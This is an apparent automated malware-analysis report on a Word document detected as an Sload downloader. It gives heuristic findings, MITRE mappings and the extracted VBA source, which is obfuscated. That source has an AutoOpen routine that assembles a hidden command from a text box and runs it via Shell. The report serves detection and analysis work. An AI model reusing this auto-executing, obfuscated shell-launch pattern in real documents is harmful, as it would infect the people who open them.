Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function. This function is used to execute external commands, indicated by heuristics firing for cmd.exe and PowerShell. The macro's obfuscated nature and the presence of these execution indicators suggest it's designed to download and run a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786419-0' further supports this downloader functionality.
Heuristics (10)

- ClamAV: Doc.Downloader.Sload-6786419-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Sload-6786419-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Potential Shell call in VBA (critical, OLE_VBA_SHELL): Potential Shell call in VBA. Matched lines in script:
    Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
    IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
    Select Case nQzIKtaZpHzqHSOnpTw
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched lines in script:
    Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
    Sub autoopen()
    rdsHZ
- Suspicious cmd.exe invocation with execution flag (high, SC_STR_CMD): Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8876 bytes |

SHA-256: 908ba386dfd98d415943aaac7ecdfef8d7ebdbf23ff2df41aca9adff84ff3cd8

Detection (extracted artifact):
- ClamAV: No threats found
- Obfuscation or payload: likely. 231 of 275 identifiers look randomly generated (e.g. 'AoNKQssDaUsEPZKiqjUCGhcz'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "pXirGKdhzK"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
rdsHZ
End Sub
Attribute VB_Name = "jwCWVLSqL"
Function rdsHZ()
On Error Resume Next
Select Case OPjwrUumFokdYaNJXofnKYv
Case 161731550
tRVPNFIltHvESaKiYZaU = PpfrqObqkpTKRz
YWsibrfSREFOVJ = Log(zVDcdbqYXqhuISctAcHFBh)
sKkWNmkzFhzqwGpUbiwVsuw = 151270208
pLEmOEkSdLRtFc = mrbNKbimLHfWDLzwONVYb
Case 211058640
rdNYUvYaWGMiBTjM = 165990150
ZtijhjGdMDjjDKGd = Log(kzDJqmhIPqcwiiAwNCmiI)
jSqjVunCCcXjzOVBiGzaSqdf = 224046435
fmqITuboQlSHRnVNoAb = Log(fmaLTflhdqoLBwOALuJcIKz)
End Select
Set ibpKFEBdEmttMionJtLaw = GUYUBuqwmUopcsq
Select Case MkbaRMulSIojIXadv
Case 129720147
wFVZFEXiFbuiBiQ = EEwwpIhCqHQbfdEfDSaMqLWV
ioJXamCrbVZwXQpYTiwowCc = Log(PiiEEEthcCLTXiPUNk)
HfifBknXcYjzbM = 256912341
vDznXcrTVFWBpTd = LwUrhzhTQhRIwFjGkWT
Case 109462163
zjfnOKwOmhJuFldsv = 173678535
WdWpLiXQWPRSzNKORoDSokFi = Log(IOqTFOowXtmaqUFruawUPJhu)
MEsHHmYsqCUhwQBcWb = 125985552
naTzbuKGJjwjvwtKwoP = Log(NiARkJzJzrthOVj)
End Select
Set kujNbRiGEolAWrjhMLLFa = NRzAJSqQRaNHZB
Select Case wWHBzDkwFPnJpNNcwfXXQf
Case 62592821
prkdBPWZfSzTuq = jEadhjdIRnYDFmKXTM
LHTHuqtNiWQthH = Log(oSpBcULjSpdLRmUv)
GrfLQzfnnVzlBtrvtwsi = 114927561
jzYARRicaKblnqczXUJOo = MzRvmPXnbMMVHfmQfOILvpJP
Case 40987762
TtbXYCwlnaiWfP = 30009655
iPZRizMHovGcDXoCplwdMD = Log(JZWsMhJitHIGuqoSWhTjdw)
hPmjjuSaaiaPsLEAai = 81856207
VuQuLBSawtUKNFpc = Log(AdoajicTavHRjtEQiwm)
End Select
Set sUfbrihKQBnWcbZBXnoMoalF = JQzPufGCchfzNiBB
Select Case VQBBXWorVhYBNfQSfJY
Case 234332107
MmCbcDiFjSQacDoUAYauZRDM = imnNpfzwaIdwZvSGmlOHalbb
ikzpXvjqcwRvrunTdBuKWbdI = Log(nfoEYsKLQKuzHCNuIzwBLu)
bozkjQbDHpAkPulDFHjbjsT = 149797475
hQOdjHdsoMQbIdvpHnKGSwAW = qubTIjUalzAMZahXrahUczd
Case 264527052
cEIQfjPrjpNBZjdwAWiuch = 82921885
iaXTBRtQnjjiLJFQkVpl = Log(WSuDYbbwtKusjiFLwp)
wwNsAwkrQOJGsbIMI = 191605100
dpSStWlmfbAEojXoY = Log(auFnkKkjDCQXWwi)
End Select
Set MciiTVOMFPQJVaUmjDiiK = FHhKSjVHFDWGTuKuoEfsiU
Select Case cAbWlCCBSQwDmNQFSHh
Case 32266878
jXEiBzaLVNmYadzR = NsiWJJuUqGiUdtKz
tdWsjFbpwDKfLjSoH = Log(panZOJJLrvqrTcaMkUuSdnD)
MFkpiWLfVzUXaTPNiYOf = 339838235
jhFzzwuoQBWHMIZ = hUjKWUHClQEjkFZXjH
Case 147756069
kiXNljjTASGHoO = 283762910
vpiPaCOitNEKczbFlWkDzWZ = Log(koBSKzsVOfbrZHchPoTXbY)
BrBVRdowZPsimAvYwUiwzXj = 210568394
uCnIDBOLzAaIcbsaiCbh = Log(phTQXCsctiIVqXbAoWO)
End Select
Set TpAVPTtqWOUIwCEVTrfz = jDVSnlDQZujNDIAhwB
Select Case YhCbQoLazirXPotXcp
Case 87490027
BhUmkshdzjNDzr = qIWKjAFNSsZMdXXuHnlSqMQq
HicSUnYXqCOGijBwTC = Log(LjDFalGQNZHdsfnZSduwFBo)
UIodGjWWKWfrDcBhOWKwiZ = 147370413
rHjSYDoKrQlRzdKdCkT = AvWpbNkiqpEvmNlwAD
Case 329729248
hUAmqkkkMhvwFAa = 315995424
tqLTGTBLqijrLdzmMofvj = Log(qdzWJuGpmnpNGNmnbBwaAGAt)
DwLsMuABuziTjK = 49031308
AsvCwWmzZMiwIwk = Log(GVFzuzatoLLNETrqrVAN)
End Select
Set rChKLTzPEswPFN = EKKDSCNmKYvFVoFnz
Const UFNwGZw = 0
Select Case cNQAdYDkAXhjNKzCTpDaWmJS
Case 128806551
KoEkDWzFVjdfir = TqRJBazzwiNDjaqDzhaN
fPUKlIoQYoKMzDvr = Log(ScLpHFqTNffffzDd)
nazwPSKjYqCqmWuLo = 100423994
CYXKdqXdIksqGjiQUuKCJAFj = odbIlUriFbpPQUIrp
Case 12668587
fzvHDGZRdNoCTnvpNwUXPBIB = 52511381
AEZCKUwGEPsVYCLCNVRZWbU = Log(uvVijiruzKFUrbCTDMjj)
rYRLMnmjiWYkuHOzUXaXzWNw = 282068904
mSzVKsohDXDSWqEL = Log(ojkzTnUjoIIzVKVUB)
End Select
Set TlNLfvMErwBBjT = FZPFOTfdmVkfhhMhzUqlZD
Select Case TcILWFbuPRLFOZnFNS
Case 245425697
jFPEVwwwUplaRFWr = MpMpDUtjsaZITAkJOm
NDpYJcZajloJCvjB = Log(YVfkVXdXXqBoAQCTJiS)
RDMiuNvERXMjzIktGc = 286092256
MAmmXlfUlqsRRdKVIBqI = YFzdSprfIMjnmLQRZGI
Case 218897647
SbivRWwPlFmiDnvmJFw = 262943419
ddMdfRtEiuibAGiVhATtQX = Log(uEiXVfQBLtmpzSR)
EEKCLEHChRQcFduYFWRZzu = 158265194
SsWhOQjDPOPpGUvqwfq = Log(OnvizOjaAsoJjl)
End Select
Set ShZoQkNMqOESkabcRDTKi = oiAhGCWZFJUldIWraUBaFTuw
Select Case ijJzRblFYErPJdGfHBNo
Case 280755963
JcECXJkZLFFlVAkkvaLIrYMT = aajjSElmkWhsPEcVztmKXIGu
FndhGlPlFwiDqsAUzk = Log(DsjVinsfaJZRUlMMQHEi)
SHKHtRJAlqXXdriZRuuNF = 270017693
ffORifkMvGrllVOoVji = SCtruinzMKQfdffcfAfUBd
Case 181549676
lFtDDFYibAJclXXvs = 240391720
lpLIFqlJVEJmobcFopjwGlmE = Log(VCrIcjbRipcZznMRwDZ)
OUBIRiGJnsACHjknu = 4788461
VhVKlAjqCWfKhNmNABirtcS = Log(lpZSRCYWvKEktKPIlsEm)
End Select
Set iSpUSjlMJzsPrZv = NZzzIOWICUqmZGBXfUC
Select Case EWYlRLQUORlKHGqDoCij
Case 25140274
KwvjjiqNUAAlIkFX = szwucNowwhjwkMMaqMZplb
dAwkKVzGwQMplFThlGjmwK = Log(knnLRYfhEQLVtfcib)
bhiYXaVXiojBppTmMzWJfiTj = 47934859
akZBJcInVcjLQNqutrw = bWBGTfHRTsNzRw
Case 1950339
zdiGtBUqGBjJTlpckEwEi = 124054873
iUrTcOjuSNEwPMrJaBLAS = Log(zziDlONBwDivAlChsbZGOwPo)
PsuWCWSQfWtlYdShQQB = 116988262
MGHsJkaLkBiuiWWTit = Log(MiUOIwTwHZzfNWEDmmis)
End Select
Set rEvVLruHvOmXVFpsrzwqmS = nWUXZSjjABtUaYtwFZqLKK
Select Case skjlfnhvUODtCn
Case 332147161
kZFXbszGvnpXzbqsLTqqUu = mFbPznrcbwFWSUHZzm
pswKwsYLiizISqESRzdw = Log(DKOatFYXEurDrFcovf)
bcJuionjNCpZVnJlhj = 234172327
nzndoFEalciWUH = rtQjmFYKUOUVPiTuELb
Case 234276715
ofGYjMvlYSFOQRrRzzz = 93728906
SPTjosRhZLtXwDOJLCtdZw = Log(PHzQbdEOdVlVQmpvTdDwGLrT)
dIouEkQWSEcobqEU = 322136895
CKhzWVHZAVzpDQfCz = Log(PUZkVzwhNGsnwiJwoJ)
End Select
Set jlSnfjuYcBLJZsjEcpRp = woIAhNXTfGbWWRjzhtAbb
EGZLukHCVif = pXirGKdhzK.TextBox1.Text + PKumhC + SIwqTV + OcGKIou + zDrRvH + hlWbk + tvHQuFlD + lERqfkON + dYmQjzrw + XmTXhpH
Select Case KtLqRsFiUWiHwNdiSczZqoc
Case 125736444
JCpjsGzPNDpfBWBfCEp = lduYGhnhBAWQsRIqQzbP
skJoCRFwtokmnnfHRcLTP = Log(NhYnjOLPCcZwstkj)
PhkHMldFiciwWQ = 316019588
fXbPOirlimHMovmWi = vlfFAwuiFlcRfMdjNWJ
Case 132339003
hqzdaiQQjqLQzUKmZWfUjc = 36538913
NGuiHhPNNjNvjba = Log(iRWuQAirTuoAdzIEl)
QTjhIBawCOHPGzvNqOGKsM = 158729852
PNtPjOaIKqLGiw = Log(UUSwTkEoqEQIuzaz)
End Select
Set vjSuILOnnwEQmo = uEmqZNESKZCKTFjKjsHK
Select Case FdRNuDEnVhJFBpdPDaEQZ
Case 306788462
FvtBpPozHpBpJIsSafrd = pRzirNMfHaJKAMSB
OXhiCPAATHKHil = Log(RTQdvWwBbTAPrfJwaQXQT)
bnCziXGCXcpcthwpFjPWFOBz = 62603271
KKjqGUOVrdawsbvYvX = PlbAlLrBzpNlDnJNvTh
Case 144672210
NXqTOHoobhSiYujiKw = 206488692
SRfdrXKjOzFOBFBOl = Log(WEDMWIvHitZilUBGBwrN)
qwEacbDcTsUzdbaLGvW = 224521107
tRJjNlMuDFWYFjIwmthri = Log(AEhHtavvBUirzivq)
End Select
Set qrhPnwYYvSNTBpqF = RECGslzHEBtOidCwfrAwv
Select Case tGJIcYwizYnKzzkDCn
Case 128641181
zTGGOqQnWEOJnvwUYNazh = BZHWtqPwRczGXZzCtmIK
vKdWCDPfpNUARSj = Log(swaYanmKhYWUVTorXXFPdzrn)
QbPfFFHSDBphliIXTpdjuKWZ = 194114494
uMRVsEnZJLXibSPCRSwJ = pwsKKOGEGFpBcLuBiIkuM
Case 162032438
AoNKQssDaUsEPZKiqjUCGhcz = 49453573
BiJNOYRzrWwDpLNBPh = Log(HfcYZuNrVrTLNDwrKuMFT)
PholnqJpERuPApYKjTBhvI = 161648635
jztUDHDcQTPujoHX = Log(jmBQzCGSAKsDlrHJiCnzo)
End Select
Set wOSzjaiavMiwOVXtlwnBDz = YicIlFlTZtupmwwW
IjwIh = Array(zfolPNr, HwFiHjwf, MoKXV, Interaction.Shell(EGZLukHCVif, UFNwGZw), qImEzuWud)
Select Case nQzIKtaZpHzqHSOnpTw
Case 80051887
jCssuZqhcCjijFcnvRWBGlTi = QfAJPbumiEOEPP
jrNEPLbNlztCcKqwjK = Log(itpYMbosBBOjjBBSOYOTqpS)
JWYSbnFiuYlbtTAca = 126129683
MWQNBascaVrApaaOpCW = NvkoHQaYuXlsXPGst
Case 62395253
sjLiJDYwASFKaECMQmb = 36961268
AThDjwdZUiVjiihCQbkiT = Log(FpMLnUDpGRDnrQdbaEv)
jkjivaVKzKrWQaNrrX = 70349907
WibDcrmQYpAfnzt = Log(FhQNztqvahWRCmkCun)
End Select
Set BJjCDoElJJLjTjslJHzIdofd = VUOlFwlzzsLZfMZvHjlPzClJ
End Function